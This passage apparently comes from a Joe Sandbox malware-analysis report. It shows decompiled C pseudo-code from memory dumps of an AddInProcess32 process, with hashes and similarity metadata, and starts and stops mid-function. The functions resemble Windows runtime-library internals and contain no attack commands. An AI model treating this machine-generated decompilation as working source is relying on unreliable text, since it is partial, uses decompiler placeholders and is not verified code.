                              					 *_t59 = _t45 + 1;
                              					L6:
                              					 *(_t83 - 4) = 1;
                              					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                              					 *(_t83 - 4) = _t80;
                              					if(_t68 < 0) {
                              						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                              						if(_t82 == 0) {
                              							goto L14;
                              						}
                              						asm("btr eax, ecx");
                              						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                              						if( *_t82 != 0) {
                              							 *0x1947b10 =  *0x1947b10 - 8;
                              						}
                              						goto L20;
                              					}
                              					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                              					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                              					_t51 =  *0x194536c; // 0x77995368
                              					if( *_t51 != 0x1945368) {
                              						_push(3);
                              						asm("int 0x29");
                              						goto L14;
                              					}
                              					 *_t55 = 0x1945368;
                              					 *((intOrPtr*)(_t55 + 4)) = _t51;
                              					 *_t51 = _t55;
                              					 *0x194536c = _t55;
                              					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                              					if(_t52 != 0) {
                              						 *_t52 = _t55;
                              					}
                              					_t39 = 0;
                              					goto L11;
                              				}
                              				_t77 =  *((intOrPtr*)(_t83 + 8));
                              				_t68 = E0188A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                              				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                              				if(_t68 < 0) {
                              					goto L14;
                              				}
                              				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                              				goto L6;
                              			}


                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f717c091e637678f4b20b460c85951802c6010f9f1b164075dbc65ffe66dd456
                              • Instruction ID: b55a074d86dea6350df1fe57bac05c33c395021bd296dd33e019f8df5afbacf9
                              • Opcode Fuzzy Hash: f717c091e637678f4b20b460c85951802c6010f9f1b164075dbc65ffe66dd456
                              • Instruction Fuzzy Hash: 70417C75A00219DFDB19EF58C480BA9BBF1FF89708F1580AAE905EB384C774EA01CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 68%
                              			E0187C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                              				signed int* _v8;
                              				char _v16;
                              				void* __ebx;
                              				void* __edi;
                              				signed char _t33;
                              				signed char _t43;
                              				signed char _t48;
                              				signed char _t62;
                              				void* _t63;
                              				intOrPtr _t69;
                              				intOrPtr _t71;
                              				unsigned int* _t82;
                              				void* _t83;
                              
                              				_t80 = __ecx;
                              				_t82 = __edx;
                              				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                              				_t62 = _t33 >> 0x00000001 & 0x00000001;
                              				if((_t33 & 0x00000001) != 0) {
                              					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                              					if(E01877D50() != 0) {
                              						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              					} else {
                              						_t43 = 0x7ffe0386;
                              					}
                              					if( *_t43 != 0) {
                              						_t43 = E01928D34(_v8, _t80);
                              					}
                              					E01872280(_t43, _t82);
                              					if( *((char*)(_t80 + 0xdc)) == 0) {
                              						E0186FFB0(_t62, _t80, _t82);
                              						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                              						_t30 = _t80 + 0xd0; // 0xd0
                              						_t83 = _t30;
                              						E01928833(_t83,  &_v16);
                              						_t81 = _t80 + 0x90;
                              						E0186FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                              						_t63 = 0;
                              						_push(0);
                              						_push(_t83);
                              						_t48 = E0189B180();
                              						if(_a4 != 0) {
                              							E01872280(_t48, _t81);
                              						}
                              					} else {
                              						_t69 = _v8;
                              						_t12 = _t80 + 0x98; // 0x98
                              						_t13 = _t69 + 0xc; // 0x575651ff
                              						E0187BB2D(_t13, _t12);
                              						_t71 = _v8;
                              						_t15 = _t80 + 0xb0; // 0xb0
                              						_t16 = _t71 + 8; // 0x8b000cc2
                              						E0187BB2D(_t16, _t15);
                              						E0187B944(_v8, _t62);
                              						 *((char*)(_t80 + 0xdc)) = 0;
                              						E0186FFB0(0, _t80, _t82);
                              						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                              						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                              						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                              						 *(_t80 + 0xde) = 0;
                              						if(_a4 == 0) {
                              							_t25 = _t80 + 0x90; // 0x90
                              							E0186FFB0(0, _t80, _t25);
                              						}
                              						_t63 = 1;
                              					}
                              					return _t63;
                              				}
                              				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                              				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                              				if(_a4 == 0) {
                              					_t24 = _t80 + 0x90; // 0x90
                              					E0186FFB0(0, __ecx, _t24);
                              				}
                              				return 0;
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                              • Instruction ID: 392b0d38f175dc7937bc808588acacf661a56dc5832e9e09b8676f72a1cc2dd6
                              • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                              • Instruction Fuzzy Hash: 8631167260154BBAD705EBB8D490BE9FB59BF52304F04416AD51CC7201DB34EB45C7E2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 76%
                              			E018D7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                              				signed int _v8;
                              				char _v588;
                              				intOrPtr _v592;
                              				intOrPtr _v596;
                              				signed short* _v600;
                              				char _v604;
                              				short _v606;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed short* _t55;
                              				void* _t56;
                              				signed short* _t58;
                              				signed char* _t61;
                              				char* _t68;
                              				void* _t69;
                              				void* _t71;
                              				void* _t72;
                              				signed int _t75;
                              
                              				_t64 = __edx;
                              				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                              				_v8 =  *0x194d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                              				_t55 = _a16;
                              				_v606 = __ecx;
                              				_t71 = 0;
                              				_t58 = _a12;
                              				_v596 = __edx;
                              				_v600 = _t58;
                              				_t68 =  &_v588;
                              				if(_t58 != 0) {
                              					_t71 = ( *_t58 & 0x0000ffff) + 2;
                              					if(_t55 != 0) {
                              						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                              					}
                              				}
                              				_t8 = _t71 + 0x2a; // 0x28
                              				_t33 = _t8;
                              				_v592 = _t8;
                              				if(_t71 <= 0x214) {
                              					L6:
                              					 *((short*)(_t68 + 6)) = _v606;
                              					if(_t64 != 0xffffffff) {
                              						asm("cdq");
                              						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                              						 *((char*)(_t68 + 0x28)) = _a4;
                              						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                              						 *((char*)(_t68 + 0x29)) = _a8;
                              						if(_t71 != 0) {
                              							_t22 = _t68 + 0x2a; // 0x2a
                              							_t64 = _t22;
                              							E018D6B4C(_t58, _t22, _t71,  &_v604);
                              							if(_t55 != 0) {
                              								_t25 = _v604 + 0x2a; // 0x2a
                              								_t64 = _t25 + _t68;
                              								E018D6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                              							}
                              							if(E01877D50() == 0) {
                              								_t61 = 0x7ffe0384;
                              							} else {
                              								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              							}
                              							_push(_t68);
                              							_push(_v592 + 0xffffffe0);
                              							_push(0x402);
                              							_push( *_t61 & 0x000000ff);
                              							E01899AE0();
                              						}
                              					}
                              					_t35 =  &_v588;
                              					if( &_v588 != _t68) {
                              						_t35 = L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                              					}
                              					L16:
                              					_pop(_t69);
                              					_pop(_t72);
                              					_pop(_t56);
                              					return E0189B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                              				}
                              				_t68 = L01874620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                              				if(_t68 == 0) {
                              					goto L16;
                              				} else {
                              					_t58 = _v600;
                              					_t64 = _v596;
                              					goto L6;
                              				}
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2790dfbb012d03be467c3a70209afc633f00002399399d97d994bad9bfa62b79
                              • Instruction ID: 32d76fdacf9478e81b592b07ab99511a9262b304187473cbbeaaedee1dc1b79c
                              • Opcode Fuzzy Hash: 2790dfbb012d03be467c3a70209afc633f00002399399d97d994bad9bfa62b79
                              • Instruction Fuzzy Hash: 4B31C0766047919BC720DF6CC840E6AB7E9FF88704F044A29F995C7690E730EA04CBA6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 92%
                              			E0188A70E(intOrPtr* __ecx, char* __edx) {
                              				unsigned int _v8;
                              				intOrPtr* _v12;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* _t16;
                              				intOrPtr _t17;
                              				intOrPtr _t28;
                              				char* _t33;
                              				intOrPtr _t37;
                              				intOrPtr _t38;
                              				void* _t50;
                              				intOrPtr _t52;
                              
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t52 =  *0x1947b10; // 0x0
                              				_t33 = __edx;
                              				_t48 = __ecx;
                              				_v12 = __ecx;
                              				if(_t52 == 0) {
                              					 *0x1947b10 = 8;
                              					 *0x1947b14 = 0x1947b0c;
                              					 *0x1947b18 = 1;
                              					L6:
                              					_t2 = _t52 + 1; // 0x1
                              					E0188A990(0x1947b10, _t2, 7);
                              					asm("bts ecx, eax");
                              					 *_t48 = _t52;
                              					 *_t33 = 1;
                              					L3:
                              					_t16 = 0;
                              					L4:
                              					return _t16;
                              				}
                              				_t17 = L0188A840(__edx, __ecx, __ecx, _t52, 0x1947b10, 1, 0);
                              				if(_t17 == 0xffffffff) {
                              					_t37 =  *0x1947b10; // 0x0
                              					_t3 = _t37 + 0x27; // 0x27
                              					__eflags = _t3 >> 5 -  *0x1947b18; // 0x0
                              					if(__eflags > 0) {
                              						_t38 =  *0x1947b9c; // 0x0
                              						_t4 = _t52 + 0x27; // 0x27
                              						_v8 = _t4 >> 5;
                              						_t50 = L01874620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                              						__eflags = _t50;
                              						if(_t50 == 0) {
                              							_t16 = 0xc0000017;
                              							goto L4;
                              						}
                              						 *0x1947b18 = _v8;
                              						_t8 = _t52 + 7; // 0x7
                              						E0189F3E0(_t50,  *0x1947b14, _t8 >> 3);
                              						_t28 =  *0x1947b14; // 0x0
                              						__eflags = _t28 - 0x1947b0c;
                              						if(_t28 != 0x1947b0c) {
                              							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                              						}
                              						_t9 = _t52 + 8; // 0x8
                              						 *0x1947b14 = _t50;
                              						_t48 = _v12;
                              						 *0x1947b10 = _t9;
                              						goto L6;
                              					}
                              					 *0x1947b10 = _t37 + 8;
                              					goto L6;
                              				}
                              				 *__ecx = _t17;
                              				 *_t33 = 0;
                              				goto L3;
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 73d7570eb8841d77d8859bba09eea82c86d63e114528e8580c5971077f18aaaf
                              • Instruction ID: 3c6951d2a8c4f3fc5c7e185a0358c8996b79e1760275062ac5d9fdcfcfa50da4
                              • Opcode Fuzzy Hash: 73d7570eb8841d77d8859bba09eea82c86d63e114528e8580c5971077f18aaaf
                              • Instruction Fuzzy Hash: 5131F5B9604619EFD72DEF88D880F25BBF9FB84750F14095AE245C7284D370AA01CB92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 97%
                              			E018861A0(signed int* __ecx) {
                              				intOrPtr _v8;
                              				char _v12;
                              				intOrPtr* _v16;
                              				intOrPtr _v20;
                              				intOrPtr _t30;
                              				intOrPtr _t31;
                              				void* _t32;
                              				intOrPtr _t33;
                              				intOrPtr _t37;
                              				intOrPtr _t49;
                              				signed int _t51;
                              				intOrPtr _t52;
                              				signed int _t54;
                              				void* _t59;
                              				signed int* _t61;
                              				intOrPtr* _t64;
                              
                              				_t61 = __ecx;
                              				_v12 = 0;
                              				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                              				_v16 = __ecx;
                              				_v8 = 0;
                              				if(_t30 == 0) {
                              					L6:
                              					_t31 = 0;
                              					L7:
                              					return _t31;
                              				}
                              				_t32 = _t30 + 0x5d8;
                              				if(_t32 == 0) {
                              					goto L6;
                              				}
                              				_t59 = _t32 + 0x30;
                              				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                              					goto L6;
                              				}
                              				if(__ecx != 0) {
                              					 *((intOrPtr*)(__ecx)) = 0;
                              					 *((intOrPtr*)(__ecx + 4)) = 0;
                              				}
                              				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                              					_t51 =  *(_t32 + 0x10);
                              					_t33 = _t32 + 0x10;
                              					_v20 = _t33;
                              					_t54 =  *(_t33 + 4);
                              					if((_t51 | _t54) == 0) {
                              						_t37 = E01885E50(0x18367cc, 0, 0,  &_v12);
                              						if(_t37 != 0) {
                              							goto L6;
                              						}
                              						_t52 = _v8;
                              						asm("lock cmpxchg8b [esi]");
                              						_t64 = _v16;
                              						_t49 = _t37;
                              						_v20 = 0;
                              						if(_t37 == 0) {
                              							if(_t64 != 0) {
                              								 *_t64 = _v12;
                              								 *((intOrPtr*)(_t64 + 4)) = _t52;
                              							}
                              							E01929D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                              							_t31 = 1;
                              							goto L7;
                              						}
                              						E0185F7C0(_t52, _v12, _t52, 0);
                              						if(_t64 != 0) {
                              							 *_t64 = _t49;
                              							 *((intOrPtr*)(_t64 + 4)) = _v20;
                              						}
                              						L12:
                              						_t31 = 1;
                              						goto L7;
                              					}
                              					if(_t61 != 0) {
                              						 *_t61 = _t51;
                              						_t61[1] = _t54;
                              					}
                              					goto L12;
                              				} else {
                              					goto L6;
                              				}
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 636c412553500a1235160f49b938a35d478eed9c20002e783bb04e9e8f00b7f4
                              • Instruction ID: fe3215966f31bc615d0953ee26c1722088f1cf223ac9ca768cc7694532214c01
                              • Opcode Fuzzy Hash: 636c412553500a1235160f49b938a35d478eed9c20002e783bb04e9e8f00b7f4
                              • Instruction Fuzzy Hash: 113138716157018FE360DF1DC940B26BBE5FF88B04F15496DEA98DB252E7B0EA04CB92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 95%
                              			E0185AA16(signed short* __ecx) {
                              				signed int _v8;
                              				intOrPtr _v12;
                              				signed short _v16;
                              				intOrPtr _v20;
                              				signed short _v24;
                              				signed short _v28;
                              				void* _v32;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				intOrPtr _t25;
                              				signed short _t38;
                              				signed short* _t42;
                              				signed int _t44;
                              				signed short* _t52;
                              				signed short _t53;
                              				signed int _t54;
                              
                              				_v8 =  *0x194d360 ^ _t54;
                              				_t42 = __ecx;
                              				_t44 =  *__ecx & 0x0000ffff;
                              				_t52 =  &(__ecx[2]);
                              				_t51 = _t44 + 2;
                              				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                              					L4:
                              					_t25 =  *0x1947b9c; // 0x0
                              					_t53 = L01874620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                              					__eflags = _t53;
                              					if(_t53 == 0) {
                              						L3:
                              						return E0189B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                              					} else {
                              						E0189F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                              						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                              						L2:
                              						_t51 = 4;
                              						if(L01866C59(_t53, _t51, _t58) != 0) {
                              							_t28 = E01885E50(0x183c338, 0, 0,  &_v32);
                              							__eflags = _t28;
                              							if(_t28 == 0) {
                              								_t38 = ( *_t42 & 0x0000ffff) + 2;
                              								__eflags = _t38;
                              								_v24 = _t53;
                              								_v16 = _t38;
                              								_v20 = 0;
                              								_v12 = 0;
                              								E0188B230(_v32, _v28, 0x183c2d8, 1,  &_v24);
                              								_t28 = E0185F7A0(_v32, _v28);
                              							}
                              							__eflags = _t53 -  *_t52;
                              							if(_t53 !=  *_t52) {
                              								_t28 = L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                              							}
                              						}
                              						goto L3;
                              					}
                              				}
                              				_t53 =  *_t52;
                              				_t44 = _t44 >> 1;
                              				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                              				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                              					goto L4;
                              				}
                              				goto L2;
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fa0e8d0a5ca647a5bc1c0233b790d39c04bbce4754e0a01860d0f8ceb85ab3ee
                              • Instruction ID: 47a541bdd3b84a15180f652d3e3850977e34e596d23da5b40fd1f78156dfc4e6
                              • Opcode Fuzzy Hash: fa0e8d0a5ca647a5bc1c0233b790d39c04bbce4754e0a01860d0f8ceb85ab3ee
                              • Instruction Fuzzy Hash: C631C571A0011AABCF15AF68CD81ABFB7B9EF44700F454069F902E7250E7789B51DBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E01898EC7(void* __ecx, void* __edx) {
                              				signed int _v8;
                              				signed int* _v16;
                              				intOrPtr _v20;
                              				signed int* _v24;
                              				char* _v28;
                              				signed int* _v32;
                              				intOrPtr _v36;
                              				signed int* _v40;
                              				signed int* _v44;
                              				signed int* _v48;
                              				intOrPtr _v52;
                              				signed int* _v56;
                              				signed int* _v60;
                              				signed int* _v64;
                              				intOrPtr _v68;
                              				signed int* _v72;
                              				char* _v76;
                              				signed int* _v80;
                              				signed int _v84;
                              				signed int* _v88;
                              				intOrPtr _v92;
                              				signed int* _v96;
                              				intOrPtr _v100;
                              				signed int* _v104;
                              				signed int* _v108;
                              				char _v140;
                              				signed int _v144;
                              				signed int _v148;
                              				signed int* _v152;
                              				char _v156;
                              				signed int* _v160;
                              				char _v164;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* _t67;
                              				intOrPtr _t70;
                              				void* _t71;
                              				void* _t72;
                              				signed int _t73;
                              
                              				_t69 = __edx;
                              				_v8 =  *0x194d360 ^ _t73;
                              				_t48 =  *[fs:0x30];
                              				_t72 = __edx;
                              				_t71 = __ecx;
                              				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                              					_t48 = E01884E70(0x19486e4, 0x1899490, 0, 0);
                              					if( *0x19453e8 > 5 && E01898F33(0x19453e8, 0, 0x2000) != 0) {
                              						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                              						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                              						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                              						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                              						_v108 =  &_v84;
                              						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                              						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                              						_v76 =  &_v156;
                              						_t70 = 8;
                              						_v60 =  &_v144;
                              						_t67 = 4;
                              						_v44 =  &_v148;
                              						_v152 = 0;
                              						_v160 = 0;
                              						_v104 = 0;
                              						_v100 = 2;
                              						_v96 = 0;
                              						_v88 = 0;
                              						_v80 = 0;
                              						_v72 = 0;
                              						_v68 = _t70;
                              						_v64 = 0;
                              						_v56 = 0;
                              						_v52 = 0x19453e8;
                              						_v48 = 0;
                              						_v40 = 0;
                              						_v36 = 0x19453e8;
                              						_v32 = 0;
                              						_v28 =  &_v164;
                              						_v24 = 0;
                              						_v20 = _t70;
                              						_v16 = 0;
                              						_t69 = 0x183bc46;
                              						_t48 = E018D7B9C(0x19453e8, 0x183bc46, _t67, 0x19453e8, _t70,  &_v140);
                              					}
                              				}
                              				return E0189B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8d56b299aa5f23aa7524d4c38bd11845eb6654efb7637c92df7b5348a9144b7f
                              • Instruction ID: 09ee0e3f341636891cfab2dab26e90e0e134c0cf17f97e03644ed136833e427b
                              • Opcode Fuzzy Hash: 8d56b299aa5f23aa7524d4c38bd11845eb6654efb7637c92df7b5348a9144b7f
                              • Instruction Fuzzy Hash: 39419CB1D003199BDB24CFAAD980AADFBF4BB49710F5481AEE509E7240EB745A84CF51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 74%
                              			E0188E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                              				intOrPtr* _v0;
                              				signed char _v4;
                              				signed int _v8;
                              				void* __ecx;
                              				void* __ebp;
                              				void* _t37;
                              				intOrPtr _t38;
                              				signed int _t44;
                              				signed char _t52;
                              				void* _t54;
                              				intOrPtr* _t56;
                              				void* _t58;
                              				char* _t59;
                              				signed int _t62;
                              
                              				_t58 = __edx;
                              				_push(0);
                              				_push(4);
                              				_push( &_v8);
                              				_push(0x24);
                              				_push(0xffffffff);
                              				if(E01899670() < 0) {
                              					E018ADF30(_t54, _t58, _t35);
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					_push(_t54);
                              					_t52 = _v4;
                              					if(_t52 > 8) {
                              						_t37 = 0xc0000078;
                              					} else {
                              						_t38 =  *0x1947b9c; // 0x0
                              						_t62 = _t52 & 0x000000ff;
                              						_t59 = L01874620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                              						if(_t59 == 0) {
                              							_t37 = 0xc0000017;
                              						} else {
                              							_t56 = _v0;
                              							 *(_t59 + 1) = _t52;
                              							 *_t59 = 1;
                              							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                              							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                              							_t44 = _t62 - 1;
                              							if(_t44 <= 7) {
                              								switch( *((intOrPtr*)(_t44 * 4 +  &M0188E810))) {
                              									case 0:
                              										L6:
                              										 *((intOrPtr*)(_t59 + 8)) = _a8;
                              										goto L7;
                              									case 1:
                              										L13:
                              										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                              										goto L6;
                              									case 2:
                              										L12:
                              										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                              										goto L13;
                              									case 3:
                              										L11:
                              										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                              										goto L12;
                              									case 4:
                              										L10:
                              										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                              										goto L11;
                              									case 5:
                              										L9:
                              										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                              										goto L10;
                              									case 6:
                              										L17:
                              										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                              										goto L9;
                              									case 7:
                              										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                              										goto L17;
                              								}
                              							}
                              							L7:
                              							 *_a40 = _t59;
                              							_t37 = 0;
                              						}
                              					}
                              					return _t37;
                              				} else {
                              					_push(0x20);
                              					asm("ror eax, cl");
                              					return _a4 ^ _v8;
                              				}
                              			}

                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 83764c80fa368f932adea62402743a0a48c1f7375c1207cf036fb16ef3ff606a
                              • Instruction ID: e03ce406c7b9c6ef2d7eeb79cde756454d5008a3dffe46cf163d2bb6a5364d5b
                              • Opcode Fuzzy Hash: 83764c80fa368f932adea62402743a0a48c1f7375c1207cf036fb16ef3ff606a
                              • Instruction Fuzzy Hash: 44317EB5A14249EFE744EF58D841F9ABBE8FB09314F14825AF904CB341D631EE80CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 67%
                              			E0188BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                              				intOrPtr _v8;
                              				intOrPtr _v12;
                              				void* __ebx;
                              				void* __edi;
                              				intOrPtr _t22;
                              				intOrPtr* _t41;
                              				intOrPtr _t51;
                              
                              				_t51 =  *0x1946100; // 0x5
                              				_v12 = __edx;
                              				_v8 = __ecx;
                              				if(_t51 >= 0x800) {
                              					L12:
                              					return 0;
                              				} else {
                              					goto L1;
                              				}
                              				while(1) {
                              					L1:
                              					_t22 = _t51;
                              					asm("lock cmpxchg [ecx], edx");
                              					if(_t51 == _t22) {
                              						break;
                              					}
                              					_t51 = _t22;
                              					if(_t22 < 0x800) {
                              						continue;
                              					}
                              					goto L12;
                              				}
                              				E01872280(0xd, 0x7e5f1a0);
                              				_t41 =  *0x19460f8; // 0x0
                              				if(_t41 != 0) {
                              					 *0x19460f8 =  *_t41;
                              					 *0x19460fc =  *0x19460fc + 0xffff;
                              				}
                              				E0186FFB0(_t41, 0x800, 0x7e5f1a0);
                              				if(_t41 != 0) {
                              					L6:
                              					asm("movsd");
                              					asm("movsd");
                              					asm("movsd");
                              					asm("movsd");
                              					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                              					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
